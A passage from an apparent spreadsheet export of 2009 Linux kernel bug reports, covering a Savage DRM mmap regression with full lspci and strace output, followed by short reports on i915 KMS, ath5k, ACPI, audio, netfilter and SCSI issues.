d800-d81f : 0000:00:10.1 d800-d81f : uhci_hcd dc00-dc1f : 0000:00:10.2 dc00-dc1f : uhci_hcd e000-e007 : 0000:00:0b.0 e400-e407 : 0000:00:0b.0 e400-e402 : parport1 e403-e407 : parport1 e800-e81f : 0000:00:0b.0 e800-e807 : serial e808-e80f : serial ec00-ecff : 0000:00:09.0 fc00-fc0f : 0000:00:11.1 fc00-fc0f : pata_via lspci -vvv 00:00.0 Host bridge: VIA Technologies, Inc. P4M266 Host Bridge Subsystem: VIA Technologies, Inc. Device 0000 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz+ UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort+ &gt;SERR- &lt;PERR- INTx- Latency: 8 Region 0: Memory at e0000000 (32-bit, prefetchable) [size=256M] Capabilities: [a0] AGP version 2.0 Status: RQ=32 Iso- ArqSz=0 Cal=0 SBA+ ITACoh- GART64- HTrans- 64bit- FW- AGP3- Rate=x1,x2,x4 Command: RQ=1 ArqSz=0 Cal=0 SBA- AGP+ GART64- 64bit- FW- Rate=x4 Capabilities: [c0] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Kernel driver in use: agpgart-via Kernel modules: via-agp 00:01.0 PCI bridge: VIA Technologies, Inc. VT8633 [Apollo Pro266 AGP] (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- DisINTx- Status: Cap+ 66MHz+ UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort+ &gt;SERR- &lt;PERR+ INTx- Latency: 0 Bus: primary=00, secondary=01, subordinate=01, sec-latency=0 I/O behind bridge: 0000f000-00000fff Memory behind bridge: ded00000-deefffff Prefetchable memory behind bridge: ceb00000-debfffff Secondary status: 66MHz- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &lt;SERR- &lt;PERR- BridgeCtl: Parity- SERR- NoISA+ VGA+ MAbort- &gt;Reset- FastB2B- PriDiscTmr- SecDiscTmr- DiscTmrStat- DiscTmrSERREn- Capabilities: [80] Power Management version 2 Flags: PMEClk- DSI- D1+ D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00:09.0 VGA compatible controller: Oak Technology, Inc OTI-64111 [Spitfire] (rev 10) (prog-if 00 [VGA controller]) Control: I/O- Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Interrupt: pin A routed to IRQ 11 Region 0: Memory at dffff000 (32-bit, non-prefetchable) [disabled] [size=4K] Region 1: Memory at df000000 (32-bit, non-prefetchable) [disabled] [size=8M] Region 2: I/O ports at ec00 [disabled] [size=256] Expansion ROM at dffe0000 [disabled] [size=32K] 00:0b.0 Serial controller: Timedia Technology Co Ltd PCI2S550 (Dual 16550 UART) (rev 01) (prog-if 02 [16550]) Subsystem: Timedia Technology Co Ltd Device 5079 Control: I/O+ Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping+ SERR+ FastB2B- DisINTx- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Interrupt: pin A routed to IRQ 11 Region 0: I/O ports at e800 [size=32] Region 2: I/O ports at e400 [size=8] Region 3: I/O ports at e000 [size=8] Kernel driver in use: serial Kernel modules: parport_pc 00:10.0 USB Controller: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller (rev 80) (prog-if 00 [UHCI]) Subsystem: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 32, Cache Line Size: 32 bytes Interrupt: pin A routed to IRQ 5 Region 4: I/O ports at d400 [size=32] Capabilities: [80] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=375mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Kernel driver in use: uhci_hcd Kernel modules: uhci-hcd 00:10.1 USB Controller: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller (rev 80) (prog-if 00 [UHCI]) Subsystem: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 32, Cache Line Size: 32 bytes Interrupt: pin B routed to IRQ 11 Region 4: I/O ports at d800 [size=32] Capabilities: [80] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=375mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Kernel driver in use: uhci_hcd Kernel modules: uhci-hcd 00:10.2 USB Controller: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller (rev 80) (prog-if 00 [UHCI]) Subsystem: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 32, Cache Line Size: 32 bytes Interrupt: pin C routed to IRQ 5 Region 4: I/O ports at dc00 [size=32] Capabilities: [80] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=375mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Kernel driver in use: uhci_hcd Kernel modules: uhci-hcd 00:10.3 USB Controller: VIA Technologies, Inc. USB 2.0 (rev 82) (prog-if 20 [EHCI]) Subsystem: VIA Technologies, Inc. USB 2.0 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 32, Cache Line Size: 128 bytes Interrupt: pin D routed to IRQ 11 Region 0: Memory at dfffef00 (32-bit, non-prefetchable) [size=256] Capabilities: [80] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=375mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME+ Kernel driver in use: ehci_hcd Kernel modules: ehci-hcd 00:11.0 ISA bridge: VIA Technologies, Inc. VT8235 ISA Bridge Subsystem: VIA Technologies, Inc. KT4AV motherboard Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping+ SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Capabilities: [c0] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Kernel modules: via-ircc, i2c-viapro 00:11.1 IDE interface: VIA Technologies, Inc. VT82C586A/B/VT82C686/A/B/VT823x/A/C PIPC Bus Master IDE (rev 06) (prog-if 8a [Master SecP PriP]) Subsystem: VIA Technologies, Inc. VT82C586/B/VT82C686/A/B/VT8233/A/C/VT8235 PIPC Bus Master IDE Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 32 Interrupt: pin A routed to IRQ 255 Region 0: [virtual] Memory at 000001f0 (32-bit, non-prefetchable) [size=8] Region 1: [virtual] Memory at 000003f0 (type 3, non-prefetchable) [size=1] Region 2: [virtual] Memory at 00000170 (32-bit, non-prefetchable) [size=8] Region 3: [virtual] Memory at 00000370 (type 3, non-prefetchable) [size=1] Region 4: I/O ports at fc00 [size=16] Capabilities: [c0] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Kernel driver in use: pata_via 00:11.5 Multimedia audio controller: VIA Technologies, Inc. VT8233/A/8235/8237 AC97 Audio Controller (rev 50) Subsystem: VIA Technologies, Inc. K7VT2 motherboard Control: I/O+ Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Interrupt: pin C routed to IRQ 5 Region 0: I/O ports at d000 [size=256] Capabilities: [c0] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Kernel driver in use: VIA 82xx Audio Kernel modules: snd-via82xx 00:12.0 Ethernet controller: VIA Technologies, Inc. VT6102 [Rhine-II] (rev 74) Subsystem: VIA Technologies, Inc. VT6102 [Rhine II] Embeded Ethernet Controller on VT8235 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR+ FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 32 (750ns min, 2000ns max), Cache Line Size: 32 bytes Interrupt: pin A routed to IRQ 5 Region 0: I/O ports at cc00 [size=256] Region 1: Memory at dfffee00 (32-bit, non-prefetchable) [size=256] Capabilities: [40] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Kernel driver in use: via-rhine Kernel modules: via-rhine 01:00.0 VGA compatible controller: S3 Inc. VT8375 [ProSavage8 KM266/KL266] (prog-if 00 [VGA controller]) Subsystem: S3 Inc. VT8375 [ProSavage8 KM266/KL266] Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz+ UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 32 (1000ns min, 63750ns max), Cache Line Size: 32 bytes Interrupt: pin A routed to IRQ 5 Region 0: Memory at dee80000 (32-bit, non-prefetchable) [size=512K] Region 1: Memory at d0000000 (32-bit, prefetchable) [size=128M] Expansion ROM at dee70000 [disabled] [size=64K] Capabilities: [dc] Power Management version 2 Flags: PMEClk- DSI+ D1+ D2+ AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Capabilities: [80] AGP version 2.0 Status: RQ=32 Iso- ArqSz=0 Cal=0 SBA- ITACoh- GART64- HTrans- 64bit- FW- AGP3- Rate=x4 Command: RQ=32 ArqSz=0 Cal=0 SBA- AGP+ GART64- 64bit- FW- Rate=x4 Kernel modules: savagefb Software Environment: Linux version 2.6.29-rc8 (alex@karlalex.palosanto.com) (gcc version 4.3.2 20081105 (Red Hat 4.3.2-7) (GCC) ) #1 PREEMPT Sat Mar 21 13:57:36 ECT 2009 If some fields are empty or look unusual you may have an old version. Compare to the current minimal requirements in Documentation/Changes. Linux karlalex.palosanto.com 2.6.29-rc8 #1 PREEMPT Sat Mar 21 13:57:36 ECT 2009 i686 i686 i386 GNU/Linux Gnu C 4.3.2 Gnu make 3.81 binutils 2.18.50.0.9 util-linux 2.14.1 mount support module-init-tools 3.5 e2fsprogs 1.41.4 pcmciautils 014 quota-tools 3.16. PPP 2.4.4 Linux C Library 2.9 Dynamic linker (ldd) 2.9 Procps 3.2.7 Net-tools 1.60 Kbd 1.12 oprofile 0.9.4 Sh-utils 6.12 udev 127 wireless-tools 29 Modules Loaded usb_storage ipv6 fuse savage drm eeprom sco bridge stp llc bnep l2cap bluetooth it87 hwmon_vid hwmon vfat fat dm_multipath uinput ppdev snd_via82xx snd_ac97_codec ac97_bus snd_seq_dummy snd_seq_oss snd_seq_midi_event snd_seq snd_pcm_oss snd_mixer_oss floppy snd_pcm i2c_viapro pcspkr sr_mod via_rhine i2c_core snd_timer mii snd_page_alloc cdrom via_ircc irda crc_ccitt snd_mpu401 snd_mpu401_uart snd_rawmidi snd_seq_device ns558 snd gameport soundcore parport_pc parport via_agp uhci_hcd ohci_hcd ehci_hcd usbcore Problem Description: A regression was introduced between 2.6.29-rc5 and -rc6 that results in an attempt to mmap2 on /dev/dri/card0 (ProSavageDDRK) to fail with EAGAIN. This hits the X server and results in broken DRI/Mesa support. Steps to reproduce: Get 2.6.29-rc6 or higher and a Savage chipset (don't know about other chipsets) Attempt to start X Report DRI support (from Xorg.0.log) When the bug hits, the following appears on the X log: ---------------- (II) [drm] loaded kernel module for "savage" driver. (II) [drm] DRM interface version 1.3 (II) [drm] DRM open master succeeded. (II) SAVAGE(0): [drm] Using the DRM lock SAREA also for drawables. (II) SAVAGE(0): [drm] framebuffer handle = 0xd0000000 (II) SAVAGE(0): [drm] added 1 reserved context for kernel (II) SAVAGE(0): X context handle = 0x1 (II) SAVAGE(0): [drm] installed DRM signal handler (II) SAVAGE(0): [agp] Mode 0x1f000207 [AGP 0x1106/0x3148; Card 0x5333/0x8d04] (II) SAVAGE(0): [agp] 16384 kB allocated with handle 0x00000001 (II) SAVAGE(0): [agp] command DMA handle = 0xe0000000 (II) SAVAGE(0): [agp] agpTextures handle = 0xe0100000 (II) SAVAGE(0): [drm] aperture handle = 0xd2000000 (II) SAVAGE(0): [drm] Enabling ShadowStatus for DRI. (II) SAVAGE(0): [drm] Status handle = 0x18a12000 (EE) SAVAGE(0): [drm] Could not map status page (II) SAVAGE(0): [drm] removed 1 reserved context for kernel (II) SAVAGE(0): [drm] unmapping 8192 bytes of SAREA 0xe0010000 at 0xb803a000 (II) SAVAGE(0): [drm] Closed DRM master. (II) SAVAGE(0): Resetting ShadowStatus. (EE) SAVAGE(0): DRI isn't enabled ---------------- A strace of the Xorg process shows: open("/dev/dri/card0", O_RDWR|O_LARGEFILE) = 12 write(0, "drmOpenDevice: open result is 12,"..., 39) = 39 ioctl(12, DEVFSDIOC_GET_PROTO_REV, 0x9f89180) = 0 ioctl(12, DEVFSDIOC_GET_PROTO_REV, 0x9f89180) = 0 ... ioctl(12, 0xc0186415, 0xbfe7c678) = 0 write(0, "(II) SAVAGE(0): [drm] Status hand"..., 49) = 49 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_SHARED, 12, 0x14335) = -1 EAGAIN (Resource temporarily unavailable) write(2, "(EE) SAVAGE(0): [drm] Could not m"..., 48) = 48 write(0, "(EE) SAVAGE(0): [drm] Could not m"..., 48) = 48 munmap(0xffffffff, 4096) = -1 EINVAL (Invalid argument)</t>
  </si>
  <si>
    <t>On GM965 KMS enabled kernel X does not draw untill mouse is moved. Probably IRQ problems.</t>
  </si>
  <si>
    <t>2.6.29</t>
  </si>
  <si>
    <t>2009-03-24 00:07 UTC</t>
  </si>
  <si>
    <t>Mateusz Kaduk</t>
  </si>
  <si>
    <t>2009-09-17 06:52 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: Every version with KMS disabled. Earliest failing kernel version: Same problem with 2.6.29rc8 Distribution: GNU/Linux Debian Sid Hardware Environment: 00:02.0 VGA compatible controller: Intel Corporation Mobile GM965/GL960 Integrated Graphics Controller (rev 0c) Software Environment: Xorg(master) libdrm(master) xf86-intel(master) mesa(master) Problem Description: X does not draw elements unless mouse currsor is moved. Moreover things are horribly slow. Also after booting in KMS enabled mode. grep i915 /proc/interrupts 29: 1 0 PCI-MSI-edge i915 After booting in KMS disabled mode. grep i915 /proc/interrupts 29: 5853 5411 PCI-MSI-edge i915@pci:0000:00:02.0 dmesg/syslog/Xorg.0.log does not produce any strange information so not attached. Steps to reproduce: Boot in KMS enabled kernel 2.6.29 on GM965 with software as above and startx or gdm.</t>
  </si>
  <si>
    <t>__branch_check__ definition in compiler.h makes sparse output unusable</t>
  </si>
  <si>
    <t>2009-03-24 05:12 UTC</t>
  </si>
  <si>
    <t>2009-04-26 11:25 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.28.8 Earliest failing kernel version: 2.6.29 Distribution: any Hardware Environment: any Software Environment: Problem Description: enabling TRACE_BRANCH_PROFILING in .config triggers so much sparse warnings that the sparse output becomes unusable. Steps to reproduce: * enable CONFIG_TRACE_BRANCH_PROFILING (I enabled this through make allyesconfig) * run make C=2 Result: a huge number of sparse warnings, e.g. ... include/linux/cpumask.h:547:2: warning: symbol '______r' shadows an earlier one include/linux/cpumask.h:547:2: originally declared here ... /tmp/bva/linux-2.6.29/arch/x86/include/asm/paravirt.h:902:2: warning: symbol '______r' shadows an earlier one /tmp/bva/linux-2.6.29/arch/x86/include/asm/paravirt.h:902:2: originally declared here /tmp/bva/linux-2.6.29/arch/x86/include/asm/paravirt.h:902:2: warning: too many warnings ... Proposed fix: in include/compiler.h, change #if defined(CONFIG_TRACE_BRANCH_PROFILING) &amp;&amp; !defined(DISABLE_BRANCH_PROFILING) into #if defined(CONFIG_TRACE_BRANCH_PROFILING) &amp;&amp; !defined(DISABLE_BRANCH_PROFILING) &amp;&amp; ! defined(__CHECKER__)</t>
  </si>
  <si>
    <t>ath5k can't switch to ad-hoc mode</t>
  </si>
  <si>
    <t>2009-03-24 10:38 UTC</t>
  </si>
  <si>
    <t>Vasyl Demin</t>
  </si>
  <si>
    <t>2009-05-10 19:15 UTC</t>
  </si>
  <si>
    <t>Distribution: Arch Linux Hardware Environment: Acer Aspire One, Atheros AR2425 03:00.0 Ethernet controller: Atheros Communications Inc. AR242x 802.11abg Wireless PCI Express Adapter (rev 01) Subsystem: Foxconn International, Inc. Device e008 Kernel driver in use: ath5k Problem Description: I can't switch wlan mode to ad-hoc Steps to reproduce: # ifconfig wlan0 down # iwconfig wlan0 mode ad-hoc Error for wireless request "Set Mode" (8B06) : SET failed on device wlan0 ; Operation not supported.</t>
  </si>
  <si>
    <t>Joshua Covington</t>
  </si>
  <si>
    <t>Fastboot Breaks Resume from S3.</t>
  </si>
  <si>
    <t>2009-03-25 10:26 UTC</t>
  </si>
  <si>
    <t>Dennis Jansen</t>
  </si>
  <si>
    <t>2009-04-15 16:30 UTC</t>
  </si>
  <si>
    <t>Created attachment 20668 [details] dmesg 2.6.29 without fastboot after resume If I enable fastboot my machine doesn't resume from S3, but hangs and then reboots. I'm not sure if it's too early to file bugs for fastboot? I'll attach a few logs. If you need anything, please let me know. I'm running the Ubuntu precompiled kernel from here: http://kernel.ubuntu.com/%7Ekernel-ppa/mainline/</t>
  </si>
  <si>
    <t>HDA Intel IDT and Nvidia MCP78 HDMI doesn't work</t>
  </si>
  <si>
    <t>2.6.27-29+</t>
  </si>
  <si>
    <t>2009-03-25 15:50 UTC</t>
  </si>
  <si>
    <t>Paolo</t>
  </si>
  <si>
    <t>2010-01-19 21:40 UTC</t>
  </si>
  <si>
    <t>My actual notebook is HP Pavillon dv7 1060L(october 2008). Sound hasn't never worked :( With my old pavillon notebooks, dv9 and others, alsa audio have always worked well. I have already un-muted all channels, but doesn't hear anything which aplay or play, amarok and audacious, when try to play a simply redalert.wav(and other .wav files). Whith kernel 2.6.27, instead, hear a caws. Whith this kernel, 2.6.29, when start playing, with play and aplay, both remain appended without hear anything: I can stop aplay with ctrl^C, but I must stop play with kill -9 &lt;n-proc&gt;, ctrl^C doesn't stop play. dmesg doesn't show any error. All seem to work well, but not sounds. I always compile audio drivers as builtin, not a module. I have first tryed to compile IDT e Nvidia togheter, doesn't work. After, I have recompiled only IDT, doesn't work. After, only Nvidia HDMI, but doesn't work. After, I have recompiled with IDT, NVIDIA and Analog Device, but doesn't work. After, recompiled with IDT, NVIDIA, Analog Device and generic HD codec parser, but doesn't work. After, stop! :) Alsamixer show me: Card: HDA Intel Chip: Nvidia MCP78 HDMI View: [Playback] Capture All Item: Master [dB gain=-9.00] But is erratic which "PCM" doesn't show channels "00" or "MM", when muted. Channels are not present in PCM. IEC958 P doesn't show channels too. Master and headphone, instead, show channels "00" and "MM", when muted, correctly(are present). What happen? I think which this is the problem: no pcm! :( Now post some commands output, I hope useful for you: ls -l /dev/snd total 0 crw-rw---- 1 root audio 116, 0 2009-03-25 16:14 controlC0 crw-rw---- 1 root audio 116, 24 2009-03-25 16:14 pcmC0D0c crw-rw---- 1 root audio 116, 16 2009-03-25 15:49 pcmC0D0p crw-rw---- 1 root audio 116, 17 2009-03-25 16:14 pcmC0D1p crw-rw---- 1 root audio 116, 19 2009-03-25 16:14 pcmC0D3p crw-rw---- 1 root audio 116, 1 2009-03-25 16:14 seq crw-rw---- 1 root audio 116, 33 2009-03-25 16:14 timer dmesg | grep hda hda_intel: azx_get_response timeout, switching to polling mode: last cmd=0x000f0000 ## "dmesg |grep audio" show nothing aplay -l **** List of PLAYBACK Hardware Devices **** card 0: Intel [HDA Intel], device 0: STAC92xx Analog [STAC92xx Analog] Subdevices: 0/1 Subdevice #0: subdevice #0 card 0: Intel [HDA Intel], device 1: STAC92xx Digital [STAC92xx Digital] Subdevices: 1/1 Subdevice #0: subdevice #0 card 0: Intel [HDA Intel], device 3: NVIDIA HDMI [NVIDIA HDMI] Subdevices: 1/1 Subdevice #0: subdevice #0 aplay -L default:CARD=Intel HDA Intel, STAC92xx Analog Default Audio Device front:CARD=Intel,DEV=0 HDA Intel, STAC92xx Analog Front speakers surround40:CARD=Intel,DEV=0 HDA Intel, STAC92xx Analog 4.0 Surround output to Front and Rear speakers surround41:CARD=Intel,DEV=0 HDA Intel, STAC92xx Analog 4.1 Surround output to Front, Rear and Subwoofer speakers surround50:CARD=Intel,DEV=0 HDA Intel, STAC92xx Analog 5.0 Surround output to Front, Center and Rear speakers surround51:CARD=Intel,DEV=0 HDA Intel, STAC92xx Analog 5.1 Surround output to Front, Center, Rear and Subwoofer speakers surround71:CARD=Intel,DEV=0 HDA Intel, STAC92xx Analog 7.1 Surround output to Front, Center, Side, Rear and Woofer speakers null cat /proc/asound/card0/codec#0 | grep Codec Codec: IDT 92HD71B7X cat /proc/asound/card0/codec#1 | grep Codec cat: /proc/asound/card0/codec#1: No such file or directory Many ThankS in advance Best Regards</t>
  </si>
  <si>
    <t>iptables command gets spurious ELOOP errors</t>
  </si>
  <si>
    <t>2009-03-25 18:39 UTC</t>
  </si>
  <si>
    <t>Francis Dupont</t>
  </si>
  <si>
    <t>2012-05-30 14:58 UTC</t>
  </si>
  <si>
    <t>Created attachment 20677 [details] diff --unified=10 net/ipv4/netfilter/ip_tables.c* &gt; d when a rule with a target like MARK --set-mark 0x80000001 then adding new other rules can failed with "Too many levels of symbolic links" (aka ELOOP) error. The problem is in kernel net/ipv4/netfilter/ip_tables.c in the mark_source_chains() routine which checks the verdict field of targets even for not standard targets. This was signaled to netfilter core team who should send it to -stable so this is mainly to get a report number. Proposed fix in attachment.</t>
  </si>
  <si>
    <t>SCSI Generic (sg): BUG: sleeping function called from invalid context</t>
  </si>
  <si>
    <t>2.6.28.9</t>
  </si>
  <si>
    <t>2009-03-26 12:27 UTC</t>
  </si>
  <si>
    <t>Tobias</t>
  </si>
  <si>
    <t>2010-01-25 13:10 UTC</t>
  </si>
  <si>
    <t>Created attachment 20685 [details] Stack trace on program kill (2.6.28.9) I am experimenting with CD audio extraction. I use the SCSI Generic driver for this. My test program uses read() and write() (instead of ioctl) to send requests to the driver and receive responses. I use SG_FLAG_DIRECT_IO. When I kill my program (because I don't want to wait until it has ripped the entire CD), I am often rewarded with messages like "BUG: sleeping function called from invalid context at linux-2.6.28.9/include/linux/pagemap.h:347". I have attached typical stack trace. Another case when I hit this BUG is when I set a time out and the CD drive doesn't respond fast enough. A stack trace is attached.</t>
  </si>
  <si>
    <t>r128: system hangs when X is started with DRI enabled</t>
  </si>
  <si>
    <t>2009-03-26 16:14 UTC</t>
  </si>
  <si>
    <t>2009-06-01 20:12 UTC</t>
  </si>
  <si>
    <t>After upgrading to kernel 2.6.29 from 2.6.28.7, the system hangs when X is started with DRI enabled. All I get is a black screen with some garbage at the top. X starts normally with DRI disabled. I've never had problems with any previous kernels up to 2.6.28.7. The videocard is an ATI Rage 128 Pro Ultra TF in an Intel AGP slot: 00:01.0 PCI bridge: Intel Corporation 82845 845 [Brookdale] Chipset AGP Bridge (rev 03) 01:00.0 VGA compatible controller: ATI Technologies Inc Rage 128 Pro Ultra TF</t>
  </si>
  <si>
    <t>ACPI: EC: missing confirmations, switch off interrupt mode on startup on 2.6.29 kernel</t>
  </si>
  <si>
    <t>2009-03-26 21:46 UTC</t>
  </si>
  <si>
    <t>Corrado Zoccolo</t>
  </si>
  <si>
    <t>2009-09-24 21:57 UTC</t>
  </si>
  <si>
    <t>My netbook (acer aspire one 110) consistently shows during boot the message ACPI: EC: missing confirmations, switch off interrupt mode &gt; [ 0.351161] calling acpi_init+0x0/0x236 @ 1 &gt; [ 0.361052] ACPI: EC: Look up EC in DSDT &gt; [ 0.367754] ACPI: BIOS _OSI(Linux) query ignored &gt; [ 0.368984] ACPI: EC: non-query interrupt received, switching to &gt; interrupt mode &gt; [ 0.860013] ACPI: EC: missing confirmations, switch off interrupt mode. &gt; [ 0.866062] ACPI: Interpreter enabled I can't say if this is a regression, since this is a new hardware, and I didn't install any previous kernel. I attached full dmesg obtained after #defining DEBUG in ec.c, and booting kernel with initcall_debug.</t>
  </si>
  <si>
    <t>[i915] allocate MCHBAR space &amp; enable if necessary</t>
  </si>
  <si>
    <t>2009-03-27 02:03 UTC</t>
  </si>
  <si>
    <t>Eric Appleman</t>
  </si>
  <si>
    <t>2010-09-03 08:54 UTC</t>
  </si>
  <si>
    <t>Fixes tiling issues and slowdown on i915 chipsets.</t>
  </si>
  <si>
    <t>SAMEIP --nodst functionality gone missing</t>
  </si>
  <si>
    <t>2.6.25+</t>
  </si>
  <si>
    <t>2009-03-27 16:48 UTC</t>
  </si>
  <si>
    <t>2012-05-30 14:59 UTC</t>
  </si>
  <si>
    <t>This was already briefly discussed on the netfilter mailinglist, but did not spark much response there. However I think this issue is a pretty obvious regression over old kernel versions and might hit quite a few people once the newer kernels get deployed into large NAT setups. Back in the days of 2.6.18 there was the SAME target which allowed, with the option '--nodst' to SNAT internal hosts to the same address of a whole SNAT range regardless of the destination address. In cb76c6a597350534d211ba79d92da1f9771f8226 the SAME target was removed from the kernel sources due to being obsolete, since the same functionality was now in nf_nat. Shortly after that a discussion Patrick McHardy proposed a patch to mimic the behaviour of SAME with --nodst in nf_nat by dropping the destination IP from the jhash. The patch was dropped shortly after because it apparently showed some uneven distribution. The whole thread can be read at http://thread.gmane.org/gmane.comp.security.firewalls.netfilter.devel/23275/focus=27670 . This thread went dead, I tried to revive it but did not get an answer. We're getting hit by this regression because we are currently NATing some thousand IP addresses (student dorms) to an external /28. It works fine with our old 2.6.18+SAME setup, but tests with 2.6.25+SNAT showed massive issues with connections from the same internal address to different destinations getting NATed to different addresses in the pool. Which breaks, for example, ICQ quite badly.</t>
  </si>
  <si>
    <t>address of acpi-devel list obsolete</t>
  </si>
  <si>
    <t>2009-03-28 15:23 UTC</t>
  </si>
  <si>
    <t>Olivier Berger</t>
  </si>
  <si>
    <t>2009-04-24 04:15 UTC</t>
  </si>
  <si>
    <t>Hi. The following paragraph should be fixed to reflect new address of acpi-devel list : /* * If your system is blacklisted here, but you find that acpi=force * works for you, please contact acpi-devel@sourceforge.net */ However : https://lists.sourceforge.net/lists/listinfo/acpi-devel mentions : Acpi-devel -- Defunct ACPI Development Discussion List Replaced by http://vger.kernel.org/vger-lists.html#linux-acpi Hope this helps, Best regards.</t>
  </si>
  <si>
    <t>Kernel panics in early boot: IO-APIC + timer doesn't work</t>
  </si>
  <si>
    <t>2.6.29-03652-g5d80f8e</t>
  </si>
  <si>
    <t>2009-03-28 19:00 UTC</t>
  </si>
  <si>
    <t>2009-04-27 20:17 UTC</t>
  </si>
  <si>
